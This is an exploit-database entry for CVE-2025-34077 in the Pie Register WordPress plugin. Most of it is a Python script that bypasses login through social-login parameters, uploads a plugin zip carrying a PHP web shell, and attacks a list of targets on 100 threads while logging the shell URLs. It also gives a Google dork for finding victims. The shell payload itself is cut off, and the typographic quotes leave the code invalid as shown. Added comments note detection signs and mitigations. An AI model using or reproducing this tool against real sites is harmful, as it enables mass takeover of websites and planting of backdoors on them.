Pie Register WordPress Plugin 3.7.1.4 – Authentication Bypass to RCE

Exploit Details

Basic Information

Exploit Title Pie Register WordPress Plugin 3.7.1.4 – Authentication Bypass to RCE
Exploit ID EDB-ID:52370
Type exploitdb
Published 2025-07-22T00:00:00
Modified 2025-07-22T00:00:00

CVSS Information

CVSS Score 10.0
Severity CRITICAL
Vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/SC:H/VI:H/SI:H/VA:H/SA:H

CVE Information

  • CVE-2025-34077

Exploit Description

Exploit……

Exploit Code

# Exploit Title: Pie Register WordPress Plugin 3.7.1.4 – Authentication Bypass to RCE

# Google Dork: inurl:/wp-content/plugins/pie-register/

# Date: 2025-07-09

# Exploit Author: Md Amanat Ullah (xSwads)

# Vendor Homepage: https://wordpress.org/plugins/pie-register/

# Software Link: https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip

# Version: <= 3.7.1.4
# Tested on: Ubuntu 22.04

# CVE: CVE-2025-34077

#!/usr/bin/env python3

import requests

import zipfile

import io

import sys

from concurrent.futures import ThreadPoolExecutor, as_completed

from colorama import Fore, Style, init

from threading import Lock

init(autoreset=True)

# NOTE(review): the string delimiters throughout this listing are typographic
# quotes (“ ” ‘ ’), an artefact of how the page was rendered; as shown the
# file is not valid Python.
# NOTE(review): this value is truncated in this copy — the PHP payload that
# followed the opening quote was stripped by extraction. Left as-is; nothing
# about its contents can be stated from the page.
SHELL_PHP = “

# Directory and archive name of the plugin that make_shell_zip() builds in
# memory; on success exploit() reports SHELL_FILE under
# wp-content/plugins/<PLUGIN_DIR>/ — a directory no administrator installed
# is the on-disk artefact a defender would look for.
PLUGIN_DIR = “evilplugin”
ZIP_NAME = “evilplugin.zip”
SHELL_FILE = “shell.php”
# Local file that exploit() appends each reported URL to.
OUTPUT_FILE = “Shells.txt”
HEADERS = {‘User-Agent’: ‘Mozilla/5.0’}
# Seconds; applied to both HTTP requests in exploit().
TIMEOUT = 10
# Serialises appends to OUTPUT_FILE across the worker threads started in main().
lock = Lock()

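def FilterURLS(site):
    """Normalise a raw target string into a base URL that ends in ``/``.

    Surrounding whitespace is stripped, ``http://`` is prepended when neither
    ``http://`` nor ``https://`` is present (the check is case-sensitive, so
    an upper-case scheme is not recognised), and a trailing slash is appended
    when missing so callers can concatenate paths directly.

    Args:
        site: hostname or URL as read from the targets file.

    Returns:
        The normalised URL string; an empty input yields ``"http://"``.
    """
    # The original used typographic quotes, which are not string delimiters
    # in Python; plain ASCII quotes restore the intended literals.
    site = site.strip()
    if not site.startswith(("http://", "https://")):
        site = "http://" + site
    if not site.endswith("/"):
        site += "/"
    return site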

def make_shell_zip():
    """Build the plugin archive in memory and return it as a rewound BytesIO.

    The zip holds two entries under PLUGIN_DIR: ``<PLUGIN_DIR>.php`` and
    SHELL_FILE. Both bodies are stripped in this copy of the page (the literal
    on the first writestr line is empty here and SHELL_PHP is cut off), so
    nothing about their contents can be stated from this listing.

    Returns:
        io.BytesIO positioned at offset 0, ready to be sent as an upload.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, ‘w’) as z:
        # Contents of this entry are not visible in this copy (see above).
        z.writestr(f”{PLUGIN_DIR}/{PLUGIN_DIR}.php”, ““)
        z.writestr(f”{PLUGIN_DIR}/{SHELL_FILE}”, SHELL_PHP)
    # Rewind so the caller reads the archive from the start.
    buf.seek(0)
    return buf

def exploit(target):
    """Run the two-step chain against one site and record any success.

    Step 1 posts ``social_site=true`` / ``user_id_social_site=1`` to
    ``<target>?pr_social_login=1`` from a fresh, unauthenticated session and
    treats any cookie the server sets as a usable login (the authentication
    bypass this page tracks as CVE-2025-34077). Step 2 reuses that session to
    upload the in-memory archive from make_shell_zip() to
    ``wp-admin/plugin-install.php?upload`` and looks for the string
    "Plugin installed successfully" in the response.

    Detection: an unauthenticated POST carrying those two parameters followed
    shortly by a plugin upload from the same client is the observable request
    pattern; on disk, a directory under wp-content/plugins/ that no
    administrator installed is the artefact. Mitigation: the header lists
    versions <= 3.7.1.4 as affected, so update the plugin; defining
    DISALLOW_FILE_MODS in wp-config.php stops step 2 from installing anything
    even when step 1 succeeds.

    Args:
        target: hostname or URL; normalised with FilterURLS() first.

    Returns:
        None. The outcome is printed, and a successful upload appends the
        resulting URL to OUTPUT_FILE.
    """
    target = FilterURLS(target)
    # One session so the cookie obtained in step 1 is sent automatically in step 2.
    session = requests.Session()
    data = {“social_site”: “true”, “user_id_social_site”: “1”}
    try:
        r = session.post(f”{target}?pr_social_login=1″, data=data, headers=HEADERS, timeout=TIMEOUT)
    except:
        # Bare except: any failure (network error, timeout, even
        # KeyboardInterrupt) is reported as [Failed] and the target abandoned.
        print(f”{Fore.RED}[Failed] – {target}”)
        return
    # Success is inferred only from the cookie jar being non-empty; the
    # response body (r) is never inspected, so any cookie at all passes here.
    if not session.cookies:
        print(f”{Fore.RED}[Failed] – {target}”)
        return
    files = {“pluginzip”: (ZIP_NAME, make_shell_zip(), “application/zip”)}
    try:
        upload = session.post(f”{target}wp-admin/plugin-install.php?upload”, files=files, headers=HEADERS, timeout=TIMEOUT)
    except:
        print(f”{Fore.RED}[Failed] – {target}”)
        return
    if “Plugin installed successfully” in upload.text:
        shell_url = f”{target}wp-content/plugins/{PLUGIN_DIR}/{SHELL_FILE}”
        print(f”{Fore.GREEN}[Exploited] – {shell_url}”)
        # main() runs many of these concurrently; the lock keeps appends to
        # the shared output file from interleaving.
        with lock:
            with open(OUTPUT_FILE, “a”) as f:
                f.write(shell_url + “\n”)
    else:
        print(f”{Fore.RED}[Failed] – {target}”)

def main(targets_file):
    """Read one target per line from ``targets_file`` and run exploit() on each.

    Blank lines are skipped. Work is fanned out over a 100-thread pool; the
    as_completed loop only waits for every future to finish — results are
    reported by exploit() itself (stdout and OUTPUT_FILE), and because no
    future's result() is ever read, an exception raised inside a worker is
    silently discarded.

    Args:
        targets_file: path of the list; open() raises if it cannot be read.
    """
    with open(targets_file, “r”) as f:
        targets = [line.strip() for line in f if line.strip()]
    with ThreadPoolExecutor(max_workers=100) as executor:
        futures = [executor.submit(exploit, target) for target in targets]
        # Block until all workers are done; nothing is collected from them.
        for _ in as_completed(futures):
            pass

# Entry point: exactly one argument, the path of a file with one target per
# line; any other argument count prints usage and exits with status 1.
if __name__ == “__main__”:
    if len(sys.argv) != 2:
        print(f”Usage: {sys.argv[0]} list.txt”)
        sys.exit(1)
    main(sys.argv[1])
